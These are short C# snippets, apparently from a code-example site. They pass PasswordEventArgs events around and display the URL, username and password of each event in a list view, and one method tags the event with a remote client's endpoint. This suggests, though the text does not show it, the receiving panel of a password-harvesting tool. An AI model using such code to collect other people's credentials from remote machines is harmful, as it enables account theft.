public static void OnGetPasswords(PasswordEventArgs e)
 {
     if (passwords != null)
     {
         passwords(new object(), e);
     }
 }
Exemple #2
0
 public void onProcessInfo(object o, PasswordEventArgs e)
 {
     string[] str = new string[3];
     str[0] = e.passwordInfo.URL;
     str[1] = e.passwordInfo.Username;
     str[2] = e.passwordInfo.Password;
     ListViewItem itm = new ListViewItem(str, 0);
     listView1.Items.Add(itm);
 }
Exemple #3
0
 public static void OnGetPasswords(PasswordEventArgs e)
 {
     if (passwords != null)
         passwords(new object(), e);
 }
Exemple #4
0
 public override void Run()
 {
     PasswordEventArgs e1 = new PasswordEventArgs(info, Client.RemoteEndPoint.ToString());
     PasswordEvent.OnGetPasswords(e1);
     info = null;
 }